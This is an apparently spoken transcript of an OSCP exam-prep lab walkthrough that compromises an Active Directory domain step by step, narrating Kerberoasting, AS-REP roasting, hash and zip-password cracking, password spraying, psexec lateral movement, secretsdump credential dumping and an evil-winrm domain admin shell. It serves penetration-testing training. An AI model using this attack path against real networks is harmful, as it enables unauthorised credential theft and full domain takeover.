wildstyle's password. And oh, but it did work group, so let's change that. Awesome, 24 bang. And yes, so default, those are all defaults, but that's not a default. Let's take a look at that. Backups? What's a backup share? I like backups. Please tell me more. Let's connect to that. So -L was listing it. In this case, let's actually take a look. Alright, so we're logged in. Oh no, access denied. Okay, so while yes, this does exist, we do not have access to it. Alright, how about we do the same thing on MS02? Nope. Okay, so no SMB shares. Well, we haven't seen anything pop open there, so that makes sense. Actually, according to this, our scan is done, and there is only port 135 open. Let's go ahead and cat. Sure enough, just 135, so there's not much that we can do with this feller, unfortunately. So what else can we do? We're gonna have to attack DC01 more than MS02 currently. Actually, you know what? That doesn't feel right. It's gotta have more than that. Let's run that scan again. Only in this case, we're going to take off T4. Let's go a little bit more slowly. See if we pick anything up. Maybe we were too quick on that. Okay, so we're going to run that. And yeah, I wonder if this was because we're running too many Nmap scans at the same time. Or maybe I was too aggressive with the T4. But here we can see we did catch some additional ports like 445. So let's try this again. So list what shares are available. Okay, there we go. See, this goes to show you can never, it never hurts to double check or go back and recheck things, especially just doing the due diligence of making sure you get the same results twice. So here we can see there is a non-default share called setup. Can we access that? Maybe we couldn't access to anything on DC01, but maybe we can access this share on MS02. Let's give it a shot. Aha, we did. What do we see? Nothing of value, just the auto logon executable that was probably used to set up an auto logon, so this is not helpful at all. Although it does at least let us know that we have SMB access, so we could potentially take advantage of that with something like PSExec once we get some credentials that have admin privileges on that machine. Or potentially if we get additional credentials, we could authenticate and see if there's a different listing of shares. Other than that, it looks like the next thing that I would typically do at this point is try and get some credentials for free. Well, what do you mean by that? Well, what I mean by that is once you have valid Active Directory credentials, we can spray those credentials against DC01 or any Active Directory domain controller as part of the domain and see if there's any Kerberoastable users or any ASRep roastable users. The intention here is that we will get hashes for free because these are exposed accounts that are intended to give us, well, that are intended to provide services, such as having a service principal name attached. So, where are we at? Well, we enumerated, we found DC01, and we also MS02. MS02 seems to have 139. Actually, I should have said 135, 139, and 445. And we saw that 445 does have a setup share. On DC01, we have quite a slew of ports open. Looks like this is still running, but we can tell we've got quite a few. SMB is the one that we immediately picked up on. So let's at least call that out. We've got 445, well, we've got 25 it looked like. Oh, no, not SMTP. 53, we had DNS and then 445. Those are the two quick and easy ones. On here we had a backups share. No access. We should say authentication denied so far. Empty. Just an auto logon file. Okay.
So now things to try. Let's try Kerberoasting. Let's start with that, and then let's also try AS rep roasting. So grab another shell just because I like to have as many terminals open as possible. So go to our desktop, DC01, just so that I know where I'm at. And in this case, we can use some of our Impacket tool set. So if we do Impacket, in this case, get user SPNs. Of course, it's going to give us all these options. What we really want is it's going to be our target and our username. So we're going to do OSCP wildstyle at DC01. Let's see what we get. Fingers crossed. Actually, I think one thing we missed is we're probably going to need to do the DCIP, and do 10, 10, 1, 200. Let's start over. So it should be Impacket, get user SPNs. In this case, what we should have been doing was, oh, yep, there it is. So we're making a request, which I mentioned, and then who are we sending it to, or who's the IP for DC? It is DC01. Who are we? We are Wildstyle. Let's try that. Uh-oh, did we miss something? Oh, yeah. OSCP, what? .lab. Boom. There we go. Syntax is everything. So this is what we were shooting for. Don't forget, that's something we enumerated earlier, right? It wasn't just OSCP, it's OSCP.lab. And we got some goodies. We essentially found that the service _IIS user has a service principal name attached to it. This guy. And sure enough, that means that we can query and get its hash. So we now have a hash we need to save. So let's take this and let's copy. And let's save. And if we do hash ID, oh, actually does not recognize it. That's funny, but we hopefully can crack this. Now that we have that, let's go ahead and see if we have any rep roastable users. So for rep roastable users, that's essentially not checking for Kerberoast pre-auth. So similarly, it's going to be in the Impacket tool set, but we can also use get, in this case, user, or no, NP users. Similarly, similar syntax, right? So dash request, DCIP, DC01, and OSCP.lab/wildstyle. Let's see if we got any repro. Oh, we do. Hello. Okay, so Metalbeard is rep roastable. So in this case, let's go ahead and copy this. Kerb5 AS rep. And let's go ahead and go back into our, actually we'll just make another one, hashes.asrep. So now we have hashes, which is, as we can see here, a Kerberos hash. And then we've also got hashes.asrep, which is our Metalbeard user with a asrep Kerberos ticket. Ticket granting service, asrep. So now what would we do? We've got hashes, If your answer is we would pass these hashes, your answer is incorrect, unfortunately, because these are not NTLM hashes, they're not NT or LM hashes, so these are not passable. But they are crackable, so let's see if we can crack them. Let's go ahead and throw one of my favorites, good old Hashcat, and start with the hashes.asrep. And we're going to use a word list. So user share word lists, rock you. Again, as far as the OSCP exam is concerned, and as far as my typical process, while there's tons of word lists you should be able to use, you should be able to crack any of the applicable words or applicable hashes on the exam with either a custom word list from a web page or some data that you've been gathering or information about the domain or the workstation, or more commonly, if you don't have anything, run RockU. If you don't find it, odds are it's not a crackable password. So let's find out if this one is crackable. We'll go ahead and let this run. Shouldn't run for too long, but you can always hit enter or hit a button and it'll tell you, hey, here's how long I have left. And as you can see here, it is recognizing the ASRep hash. It's running the RockU file as its base, and it came back, and sure enough, we did not recover anything. So we could also add on, if you have the time, although it's not always necessarily the right move, but add on a rule set. So we could say user share Hashcat rules. Honestly, I usually have good success with the best 64. If you don't find it with that, again, odds are it's not going to be crackable, at least not within the OSCP exam expectations of being crackable. So we'll run that. And in this case, see, as soon as you add that rule set on there, it takes much longer because it's applying those variations and mutations to every word in the RockU list. So here we can see the guest mod is this rule list. So just for the giggles, I'll go ahead and let this run for 10 minutes and let's see if it comes back with anything. But if I was doing this during the exam, I would continue to, in this case, enumerate further, because if I run two cracks, one on this and one on the Kerberoast hash at the same time, it's just going to cut down the time, or it's going to extend the time to crack both, because, well, we've only got so much CPU power, and we are, as you can see here, pegged out. We're using all of our resources. So we'll come back when this finishes in about 10 minutes. And sure enough, we finished, and it was not recovered, which means this was probably a waste of time, but you don't really know until you invest that. So again, always be multitasking. In this case, now that we verified we cannot crack the ASRep hash that belongs to Metalbeard, how about the Kerberoast? So now let's go ahead and run Hashcat again against hashes and use our RockU word list to see what happens here. Quick status check. Should only take about 4 more. Oh, and we got a hit. Hello. The service account's password is Portland7@. Wonderful. Now we've got some additional access. And again, these were credentials we got for free. Didn't cost us anything. So let's save this. So ASRep roasting found Metalbeard, but password not crackable. Kerberoasting, we found service IS and password was crackable, and it is Portland7@. So we'll take that, copy that. We've now got some credentials to save. So when we go down here, credentials, now we've also got OSCP/SVCIS. The password is Portland. So we've got 2 sets of creds.
So what's the first thing that we do when we get additional sets of credentials? We enumerate with those credentials, right? Everything is started all over. So now let's add on here found ASRep and Kerberoasting users SVCIIS password was crackable. So now we're on to step 9, which is further enumeration. So let's go ahead. We already saw the SMB services were open. We saw we had some shares. Let's go back. Let's retry. That's our things to try now, right? Now let's go back and let's enumerate SMB with new creds, the service account. Let's go ahead and clear this, and let's continue. So another tool that I like to use when I'm beginning my SMB enumeration is also to enumerate privileges. So there's a fantastic tool for that called CrackMapExec, or CME for short. So CrackMapExec can help us with the SMB protocol. To use it though, what we're going to need to do is create just a couple of easy files. So let's do nano users. Actually, no, let's do this at the Active Directory levels. Let's go back. We know we have wild style. We know we now have SVCIIS. For passwords, we know we have wild style's password, which was awesome24 bang. And now we just received the service IIS. Let's save that. And now we can do CrackMapExec SMB, and it'll be -u for users, passwords, and who are we going to look at? Let's look at DC01. Oh, and I think I did that incorrectly in my order. Again, helps to have right syntax. It's either that or does not like that. How about 10, 10, 1, 200? Okay, so apparently it just doesn't like host names. That's the problem. So in that case, and again, great thing about CrackMapExec is you just give it a destination and it will come back with a whole bunch of juicy info as well, fingerprinting what we're looking at. So port 445 SMB 10.10.1.200 is hostname DC01. Here's our OS, our hostname, and our domain name. And it looks like SMB signing is on. SMB version 1 is not enabled. So now let's go ahead and do our instead of this. So now we know it's that, and -u users, -p passwords. Let's see what we get now. Oh, and we forgot to say, because it'll just stop on the first success. Continue on success. Okay, so definitely doesn't show that we have any special privileges, but we can log on. So we may want to see if we get different levels of access. Same thing, we can do this against 10.10.102, which is MS02. What do we get? Okay, same thing. We can log on with SMB, but that's still no special admin access. So let's do that. Let's go ahead, go back to our good old friend SMB. Well, it's clear. SMB client, and let's in this case do DC01, and let's go do our backup share we saw again. It was backups, user is going to be OSCP, and instead of wild style this time we're going to try SVCIIS, and our password was Portland. What was it? It was Portland 7 ampersand, Hello. We now have access. We're not getting denied. So there is an itusers.zip file in a backups share. This sounds fantastic. I want this. Please, let's check this out. So in this case, let's go ahead and say, I believe it's get itusers.zip. That should download it. Yes, that downloads it. Let's exit. Let's move this file to DC01 files. Alright, let's check this out. Let's 7-zip extract. Oh, you want a password? Okay. So, no password. If I just hit enter, error, does not work. Okay, let's try. Oh, but of course, quit. Yeah, 0 bytes, so there's nothing there. So let's try this again. How about password? How about admin? How about password 123? Okay, well, we could spend all day and all night trying these out, or there might be a faster way to do this than manually. Let's leverage Hashcat, or better yet, we can't actually, because Hashcat won't work with this. There is a way to do this though, and that's with JohnTheRipper. However, John can't work with the zip file directly. What it needs is that password hash, right? Because we don't crack zip files, we just crack hashes. So there is an actual tool for this called zip to John. So we say zip to John and give it the zip file. It's going to spit out a hash. Let's actually save that to itusers.hash. I'm going to remove the itusers.txt file since that's empty. Don't need that confusing us. So we have a hash file and we have our zip file. So now we can take, let's go ahead and clear JohnTheRipper, and we can throw it at the itusers hash, but we're going to need some password list. And what's the password list that we default to, or I default to, for the OSCP? It is, well, we're going to have to say, not rules, it's going to be word list, I believe, -- word list. Equals user share word lists and rock you. Let's see what we come, and bingo, immediately we get a hit. That's fast. John, thank you. You are fast. tbrick14. Okay, let's try that. So if we say 7-zip extract itusers.zip and we give it t.brick14, everything is okay. We now extracted our file. What do we have? This looks good. We have 109 bytes of text. Please have some juicy goodness in here. Let's see what we got. Yes, we have credentials. This is fantastic. So we've got usernames and passwords. We were just using a tool a second ago that might help us out with some usernames and password spraying. Let's go back to CrackMapExec. So CrackMapExec can leverage this information very quickly to our advantage. So let's go ahead and use CrackMapExec SMB 10.10.1.200 and 10. Should be able to do comma 10.10.1.202. See if that works first of all. Check that. Oh, I don't think it liked that. How about dash?
Yep, that works better. Okay, so we're just going to use the dash and just ignore anything we get for 201 since we already own that box. And then we can say -u itusers.text and continue on success. Oh, and we forgot itusers.text. Oh, that doesn't work. Look at that. So instead, it's actually grabbing the usernames and the passwords and passing them all at the same time. So that's not going to work for us. So in this case, quick workaround would be to say cat itusers.text, and let's do cut. Our delimiter is that, and we want the first field, and spit that out to users.text. In this case, we'll just say users. Now do the second field, spit that out. And that is passwords. Now we can go back to our CrackMapExec and say users, passwords. In this case, I think was it domain? Because we want to make sure and specify that as oscp.lab. Oh, hello. Anyone see that? I saw that. So as we go through and spray these, you'll see Superman with superhero, Superman. It's basically going through and doing every combination of the usernames and passwords, seeing if there's any shared passwords across there. And sure enough, Emmet works on DC01, which is great. We can look to see if we have any additional shares or privileges that we might have access to on those shares. But more importantly, Pwnage. Look at that. So Emmet with Rex rules has admin access to MS02. That is lateral movement. Now we're able to jump from MS01. Well, technically we're going to be running through MS01, and we now have potentially admin access to MS02. That's instant admin access. We don't even have to privilege escalate in this case. So let's try that. Let's test that out. What are we going to use? Hint, it's not going to be SMB client. Different tool. Fantastic tool. We're going to use the in-packet version of PSExec, because PSExec will take advantage of that SMB protocol and essentially run. It will give us a shell as Emmet. So let's check our commands, make sure that we understand how we use it correctly, because as we saw earlier, syntax matters and order matters. So in this case, we're going to go ahead and say, we don't need to run a command. We just want to go ahead and say PSExec OSCP/Emmet. I believe it'll just be at, or in this case we would just give it a, yeah, let's do the at 1010. Let's use the IP just to be specific here. 202 password, paste. Yes, and we did. We requested a share, got access to the admin share, uploaded our payload, opened it with using a service, creating a service. We use Service Manager to create a service, start it, and boom, got ourselves a reverse shell. And who am I? System on MS02. Oh, that is so wonderful. That is instant admin access, immediate privilege escalation. What's the next thing that we want to do since we have privilege escalation on an additional machine? We want to search for the loot, right? Let's search for the loot. So let's go ahead and go to /. Traditionally, and on the exam, I expect everything to be under users. But again, on your control panel, it should tell you where to search or more specifically, what's going to be important. And I see a Lord Business. Lord Business, what are you doing on this machine, huh? I mean, that makes it pretty quick and easy. What if we just go to Lord Business? And what are the odds? It should be potentially on the desktop. Sure enough, there it is. There's our loot. Type proof.txt. Bam. That is money. Let's copy that. And let's save that. So exit. MS02. Directory loot. Already there. Nano proof.txt. Paste clipboard. Oh, and we forgot the big, most important thing, especially for the exam, right? It's going to be jump in there as Emmet. And let's go ahead and, oh, we need to go back and grab that password because I do not remember what that was off the top of my head. Cat. Oh, that was DC01 files, IT users, text, that password. Users, Lord Business Desktop. So for the exam, right, we type show me the money, give me that data, do who am I, IP config, and I always like to do host name as well. There we go. Take a screenshot of that, boom. That is your evidence for your submissions that you need. That's what you build in your report. From there, we can exit back out. We've got our loot. So now that we've got that, let's go ahead and update our documentation to say we found an it-users.zip file on backups share from DC01. Then what did we do? We cracked the password for it-users.zip with CrackMapExec. And at that point, we found it-users.txt with credentials within the zip file. Sprayed. At that point, what did we do? We sprayed new credentials against MS02 and DC01 and found Emmet. OSCP Emmet has local admin privileges on MS02. At that point, we're at the next step. So we've kind of been flying along here. This is what we've been doing with our things to try. We've added a few options on here. We now have another set of credentials, OSCP Emmet, and that password with Rex rules. So at this point, we know we have local access onto MS02. We can go ahead and run. Well, actually, we already noticed that there was another user logged on, Lord Business, right? We've got credentials. Let's go ahead and go back and log back on. Let's do some quick manual enumeration. We can have a shell here essentially as Emmet and a local admin, but domain user credentials. And now we have interest in this Lord Business, right? Who's Lord Business? What can we find in there? We might have some juiciness. Let's see. Text. Actually, this would be Lord Business
star.text. Oh, you're kidding me. No, you're not kidding me, because that makes sense. We're on Windows, not Linux. What are you thinking? Get your syntax right. So we found our proof. The rest of this is a lot of fluff in the app data local packages. So there's nothing else I'm seeing that's going to be helpful. We can't really clear this. But what might be helpful is checking out what that user is. Now, since we have credentials, we can do our typical local, actually we could say net user, see what users we have. So there's no other local users on this machine, but we can also now do net user / domain. And we can look at all the domain users. And sure enough, there is a domain user for Lord Business. Tell me more about Lord Business. Net user Lord Business / domain. What? Do you see this? Do you see what I'm seeing? Lord Business, group memberships, domain admins. That is a domain admin account. This is domain ownage, if we can get access to this. So this is very, very interesting. I would love to know more. And more importantly, so at this point we know that Lord Business is logged in. Well, what are the odds Lord Business's credentials are cached on this machine? Do you think we can grab that? This is an example where we could use Mimikatz, but there's another tool that allows us to do this remotely from our Kali box. Let's use Impacket, because Impacket is so awesome. That tool set is fantastic. secretsdump. So secretsdump can do a number of different things, but it's all about giving us credentials. It's almost like a remote version of Mimikatz, right? So if we do secretsdump and we point it at our destination, in this case MS02, well, what we want to do is let's try secretsdump, and in this case we know our OSCP emit at 10.10.1.202 should have local admin privileges, because just like PSExec, it needs admin privileges, at least local admin privileges. Here we go. Fingers crossed. What are we going to get? So, oh yeah, money. That's what we're getting. And absolutely sure enough, so not only do we have dumped cached domain credentials of Lord Business, but even better than that, default password, this is actually set for potentially like auto logon, which we saw in that setup file or setup directory, which would make sense as to sure enough, Tacos Tuesday, Lord Business. We now have plain text credentials for Lord Business. If we didn't, then we could also run or play past the hash with essentially the NT hash for Lord Business. But we don't even need it in this case because we have the plain text password. So let's give that a shot. What do you think? Let's update our documentation. Used secretsdump to extract cached creds from MS02 and found Lord Business hash and password. We also used net user command to enumerate that Lord Business is a member of domain admins. Fantastic. So you might be thinking exactly what I'm thinking, which is the next step to let's attempt to use Lord Business and PSExec perhaps? Actually, better than that, domain controllers have WinRM enabled. So there's another tool that gives us native abilities and some additional abilities on top of PSExec. That is evil-winrm to obtain domain admin shell on DC01. Let's see if this works. And we can use evil-winrm two ways. We can use it with the hash, and we can also use it with the password. So let's go ahead and try, just for fun, with the hash. In this case, it would be evil-winrm. Let's double check. So the user OSCP /lord business, and our target is going to be, actually, so in this case, I take that back. It's going to be -I. I was just seeing that right there, -I for the IP. So we can just say DC01. Well, let's go ahead and use the IP 10.10.1.200. The user is going to be Lord Business. We can skip the OSCP. It's actually implied since we're hitting a domain controller. And let's try the hash. So capital H for the hash, and let's paste that. That's a password. We'll try that next. Paste selection. Let's see if that works. I like to do past the hash also, just because we know that the hash should be good. So establishing connection to remote endpoint. Oh, and authorization denied. So maybe that is not an NT hash. We might have to use Mimikatz or another tool to get the NT hash. I'm going to guess that that's not it. Thankfully, we don't have to go through any password cracking. Again, we can just go right back to our plain text password. So instead of -H, we'll just do -P. Oh yeah, that's it. We're in. And sure enough, if we go to our desktop, I'm gonna guess. Oh, well, you're not gonna show me anything, really? Nothing on there, huh? Okay. How about, there we go, administrator. I betcha. Let's just look. How about tree actually? /F/A administrator. Boom, there it is. Desktop proof. Absolutely. Type, actually no, let's go into it. Administrator, desktop, and let's get our screenshot, right? What do we want? We want proof.txt. We want who am I? We want ipconfig. And what do I also like to do, just for giggles? Hostname. Bam, screenshot that. In this case, we can also say download, I believe, with evil-winrm. We've got some other cool options, like we can upload and download files that isn't, I don't believe, supported with PSExec. So we can say download proof.txt. Sure enough, got it. And we need to move that. That should not belong there. Proof.txt. Let's go to DC01 loot, and let's cat that. Sure enough, there we go. We have just obtained complete domain admin privileges. We were able to obtain the loot from all of our Active Directory set. This was step-by-step how to move through one example attack path. So at this point, we didn't attempt, we did. We used Lord Business and evil-winrm to obtain domain admin shell on DC01, and we got our proof.txt. So at this point, we want to go back
I would double check everything, verify everything. I would take screenshots again and basically start writing my report with what I had known, assuming that I didn't have 3 more boxes to do, which on the exam you will, of your independent machines that also need to be hacked. So the Active Directory set that we just went through only represents 3 of the boxes out of the 6 that you need to work on and attack if you want to get 100% on the exam. So we again moved into MS01, exploiting some code, some remote arbitration that's unfortunately unauthenticated, using that software running on MS01. And at that point we're able to use the service to get the unquoted service path to get privilege escalation on MS01. And then at that point we're able to gather we found Wildstyle's credentials saved in the PowerShell history, and then used that to enumerate. We found SMB shares on DC01. From there we had to use some Kerberoasting to actually get some free credentials and use those creds that actually did have access to that share on DC01. Found the zip file, had to crack the password on the zip file, and within the zip file was our text file with some more credentials. But then we had to enumerate those credentials and found that one of them, Emmett, had admin access on MS02. And then with that, we were able to enumerate that there was a domain admin logged on to MS02. So we dumped the credentials. And within the dumped credentials of MS02, we found Lord Business. And Lord Business was our domain admin that gave us access directly into the domain controller and had immediate admin and full domain ownage. Hopefully you all followed and enjoyed that. If nothing else, this is going to be great documentation and a reminder for one of the attack paths that I like to practice. And I suppose if there's enough demand, we may throw some other ones out there, some additional ones that I practiced and that I thought were worthwhile to essentially practice all of the variety of ways of attacking Active Directory for the OSCP.